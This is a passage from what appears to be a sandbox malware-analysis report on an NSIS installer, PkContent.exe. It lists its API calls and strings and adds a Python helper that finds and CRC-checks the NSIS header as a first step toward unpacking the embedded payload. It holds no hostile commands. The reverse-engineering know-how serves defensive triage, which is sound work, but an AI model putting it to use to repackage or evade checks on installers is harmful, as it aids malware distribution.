                                                • ShowWindow.USER32(?), ref: 00401753
                                                • ShowWindow.USER32(?), ref: 00401767
                                                • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                Strings
                                                • SetFileAttributes failed., xrefs: 004017A1
                                                • CreateDirectory: "%s" created, xrefs: 00401849
                                                • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                • Sleep(%d), xrefs: 0040169D
                                                • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                • BringToFront, xrefs: 004016BD
                                                • Aborting: "%s", xrefs: 0040161D
                                                • detailprint: %s, xrefs: 00401679
                                                • Rename failed: %s, xrefs: 0040194B
                                                • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                • Jump: %d, xrefs: 00401602
                                                • Rename: %s, xrefs: 004018F8
                                                • Rename on reboot: %s, xrefs: 00401943
                                                • Call: %d, xrefs: 0040165A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                • API String ID: 2872004960-3619442763
                                                • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                 Control-flow Graph
                                                 • Graph image not reproduced in text: function at 0040592C (legend: Executed / Not Executed)
                                                APIs
                                                  • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                  • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                  • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                  • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                Strings
                                                 Memory Dump Source
                                                 • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                • API String ID: 608394941-1650083594
                                                • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                • lstrcatW.KERNEL32(00000000,00000000,TravelersDevelopingImpactsJewsInstructorOriginal,004CB0B0,00000000,00000000), ref: 00401A76
                                                • CompareFileTime.KERNEL32(-00000014,?,TravelersDevelopingImpactsJewsInstructorOriginal,TravelersDevelopingImpactsJewsInstructorOriginal,00000000,00000000,TravelersDevelopingImpactsJewsInstructorOriginal,004CB0B0,00000000,00000000), ref: 00401AA0
                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                 Memory Dump Source: same snapshot as listed above (source 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, offset 00400000, based on PE; identical list of associated dumps)
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$TravelersDevelopingImpactsJewsInstructorOriginal
                                                • API String ID: 4286501637-4034153992
                                                • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                 Control-flow Graph
                                                 • Entry 00403587, basic blocks 403587-4037ca; graph image and node/edge list omitted, executed/not-executed colouring not preserved
                                                 • Blocks with API calls: 403587-4035d5 GetTickCount, GetModuleFileNameW; 4035e1-40360f GetFileSize; 40373f-403769 GlobalAlloc; 403794-4037af SetFilePointer
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00403598
                                                • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                  • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                  • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                Strings
                                                • soft, xrefs: 00403675
                                                • Null, xrefs: 0040367E
                                                • Inst, xrefs: 0040366C
                                                 • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author , xrefs: 004037C5
                                                • Error launching installer, xrefs: 004035D7
                                                 Memory Dump Source: same snapshot as listed above (source 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, offset 00400000, based on PE; identical list of associated dumps)
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                 • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author $Null$soft
                                                • API String ID: 4283519449-527102705
                                                • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

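The routine at 00403587 above reads the running executable back in (GetModuleFileNameW, CreateFileW, GetFileSize), compares four-byte constants "Null", "soft" and "Inst" (xrefs 0040366C, 00403675, 0040367E) and falls back to "Installer integrity check has failed": this is the NSIS installer stub locating its firstheader (signature 0xDEADBEEF followed by "NullsoftInst") and verifying the CRC-32 stored in the last four bytes of the file. The helper below is an added triage example and is not code from PkContent.exe, from NSIS or from Joe Sandbox. The struct layout, flag bits and the 512-byte scan step are taken from NSIS Source/exehead/fileform.h and the stub's loadHeaders loop; the constructed stand-in produced by build_sample() and the dictionary field names are this example's own assumptions.

```python
"""Locate and check the NSIS 'firstheader' that the stub routine at 00403587 searches for.

Added example for this report (not code from PkContent.exe, NSIS or Joe Sandbox).
Struct layout and flag bits follow NSIS Source/exehead/fileform.h; the sample bytes
built by build_sample() are a constructed stand-in, not bytes from the analysed file.
"""
import struct
import zlib

FH_SIG = 0xDEADBEEF                                               # firstheader.siginfo
FH_INT1, FH_INT2, FH_INT3 = 0x6C6C754E, 0x74666F73, 0x74736E49    # "Null", "soft", "Inst"
FH_MAGIC = struct.pack("<IIII", FH_SIG, FH_INT1, FH_INT2, FH_INT3)  # b"\xef\xbe\xad\xdeNullsoftInst"
FH_SIZE = 28                                                      # seven little-endian 32-bit ints
FH_FLAGS_UNINSTALL, FH_FLAGS_SILENT, FH_FLAGS_NO_CRC, FH_FLAGS_FORCE_CRC = 1, 2, 4, 8
FH_FLAGS_MASK = 0xF
SEARCH_STEP = 512          # the stub reads its own image 512 bytes at a time until the header matches


def find_firstheader(data: bytes):
    """Offset of the firstheader, or None.

    Like the stub, only 512-byte boundaries are tested and unknown flag bits reject a
    candidate. The stub additionally demands that length_of_all_following_data equals
    the bytes remaining to end of file; that test is reported by parse_firstheader()
    instead of enforced here, so a sample with data appended after the CRC is still found.
    """
    for off in range(0, len(data) - FH_SIZE + 1, SEARCH_STEP):
        if data[off + 4:off + 20] != FH_MAGIC:
            continue
        flags = struct.unpack_from("<I", data, off)[0]
        if flags & ~FH_FLAGS_MASK:
            continue
        return off
    return None


def parse_firstheader(data: bytes):
    """Decode the firstheader and redo the stub's integrity check; None if no header."""
    off = find_firstheader(data)
    if off is None:
        return None
    flags, _sig, _n1, _n2, _n3, header_len, following = struct.unpack_from("<7I", data, off)
    info = {
        "offset": off,
        "flags": flags,
        "uninstaller": bool(flags & FH_FLAGS_UNINSTALL),
        "silent": bool(flags & FH_FLAGS_SILENT),
        "header_len": header_len,          # size of the decompressed NSIS header that follows
        "following_len": following,        # bytes from the header to end of file, CRC included
        "size_consistent": following == len(data) - off,
        # /NCRC on the command line can skip the check unless FORCE_CRC is set; NO_CRC drops it
        "crc_present": not (flags & FH_FLAGS_NO_CRC),
        "crc_ok": None,
    }
    if info["crc_present"] and len(data) - off >= FH_SIZE + 4:
        stored = struct.unpack_from("<I", data, len(data) - 4)[0]
        # NSIS appends a standard CRC-32 of everything before it as the final four bytes
        info["crc_ok"] = zlib.crc32(data[:-4]) == stored
    return info


def build_sample(with_crc: bool = True, corrupt: bool = False) -> bytes:
    """Constructed stand-in for an NSIS-built executable (assumption, not real sample bytes):
    a dummy 1024-byte stub, the firstheader on the next 512-byte boundary, placeholder
    compressed header and data blocks, then the trailing CRC when enabled."""
    stub = b"MZ" + b"\x00" * 1022
    header_blob = b"H" * 64                  # stands in for the compressed NSIS header
    datablock = b"D" * 200                   # stands in for the compressed file data
    flags = 0 if with_crc else FH_FLAGS_NO_CRC
    following = FH_SIZE + len(header_blob) + len(datablock) + (4 if with_crc else 0)
    fh = struct.pack("<7I", flags, FH_SIG, FH_INT1, FH_INT2, FH_INT3, len(header_blob), following)
    image = stub + fh + header_blob + datablock
    if with_crc:
        crc = zlib.crc32(image)
        if corrupt:
            crc ^= 0x1                       # one flipped bit reproduces the failure path in the report
        image += struct.pack("<I", crc)
    return image


if __name__ == "__main__":
    for label, sample in (("intact", build_sample()),
                          ("corrupt crc", build_sample(corrupt=True)),
                          ("no crc", build_sample(with_crc=False))):
        print(label, parse_firstheader(sample))
```

To use it on a real file, pass the file's bytes to parse_firstheader(); a result with crc_present True and crc_ok False is the state that produces the "Installer integrity check has failed" string seen at 004037C5, and size_consistent False means bytes were appended or truncated after build, which the stub also treats as a failed header match. The offset returned is where the compressed NSIS header starts, which is the input an unpacker needs to recover the embedded script and payload.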
                                                 Control-flow Graph
                                                 • Entry 0040337F, basic blocks 40337f-403585; graph image and node/edge list omitted, executed/not-executed colouring not preserved
                                                 • Blocks with API calls: 4033e7-403407 GetTickCount; 40345c-403473 GetTickCount; 403485-4034b6 MulDiv, wsprintfW; 4034c9-4034db WriteFile; 40355f-403572 WriteFile
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 004033E7
                                                • GetTickCount.KERNEL32 ref: 00403464
                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                • wsprintfW.USER32 ref: 004034A4
                                                • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                 Memory Dump Source: same snapshot as listed above (source 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, offset 00400000, based on PE; identical list of associated dumps)
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: CountFileTickWrite$wsprintf
                                                • String ID: ... %d%%$P1B$X1C$X1C
                                                • API String ID: 651206458-1535804072
                                                • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                 Control-flow Graph
                                                 • Entry 00404F72, basic blocks 404f72-405044; graph image and node/edge list omitted, executed/not-executed colouring not preserved
                                                 • Blocks with API calls: 404fa9-404fb5 lstrlenW; 404fb7-404fc7 lstrlenW; 404fc9-404fcd lstrcatW; 404fd8-404fdf SetWindowTextW; 404feb-40502d SendMessageW (three calls)
                                                APIs
                                                • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                 Memory Dump Source: same snapshot as listed above (source 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, offset 00400000, based on PE; identical list of associated dumps)
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                • String ID:
                                                • API String ID: 2740478559-0
                                                • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                                 Control-flow Graph
                                                 • Entry 00401EB9, basic blocks 401eb9-4030f2; graph image and node/edge list omitted, executed/not-executed colouring not preserved
                                                 • Blocks with API calls: 401f53-401f7b GlobalAlloc; 402387-40238d GlobalFree
                                                APIs
                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                 Memory Dump Source: same snapshot as listed above (source 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, offset 00400000, based on PE; identical list of associated dumps)
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: FreeGloballstrcpyn
                                                • String ID: Exch: stack < %d elements$Pop: stack empty$TravelersDevelopingImpactsJewsInstructorOriginal
                                                • API String ID: 1459762280-2310787730
                                                • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                Control-flow Graph

                                                control_flow_graph 766 4022fd-402325 call 40145c GetFileVersionInfoSizeW 769 4030e3-4030f2 766->769 770 40232b-402339 GlobalAlloc 766->770 770->769 771 40233f-40234e GetFileVersionInfoW 770->771 773 402350-402367 VerQueryValueW 771->773 774 402384-40238d GlobalFree 771->774 773->774 777 402369-402381 call 405f51 * 2 773->777 774->769 777->774
                                                APIs
                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                • String ID:
                                                • API String ID: 3376005127-0
                                                • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                                Control-flow Graph

                                                control_flow_graph 782 402b23-402b37 GlobalAlloc 783 402b39-402b49 call 401446 782->783 784 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 782->784 789 402b70-402b73 783->789 784->789 790 402b93 789->790 791 402b75-402b8d call 405f6a WriteFile 789->791 792 4030e3-4030f2 790->792 791->790 796 402384-40238d GlobalFree 791->796 796->792
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                • String ID:
                                                • API String ID: 2568930968-0
                                                • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                                Control-flow Graph

                                                control_flow_graph 799 402713-40273b call 406009 * 2 804 402746-402749 799->804 805 40273d-402743 call 40145c 799->805 807 402755-402758 804->807 808 40274b-402752 call 40145c 804->808 805->804 809 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 807->809 810 40275a-402761 call 40145c 807->810 808->807 810->809
                                                APIs
                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                Strings
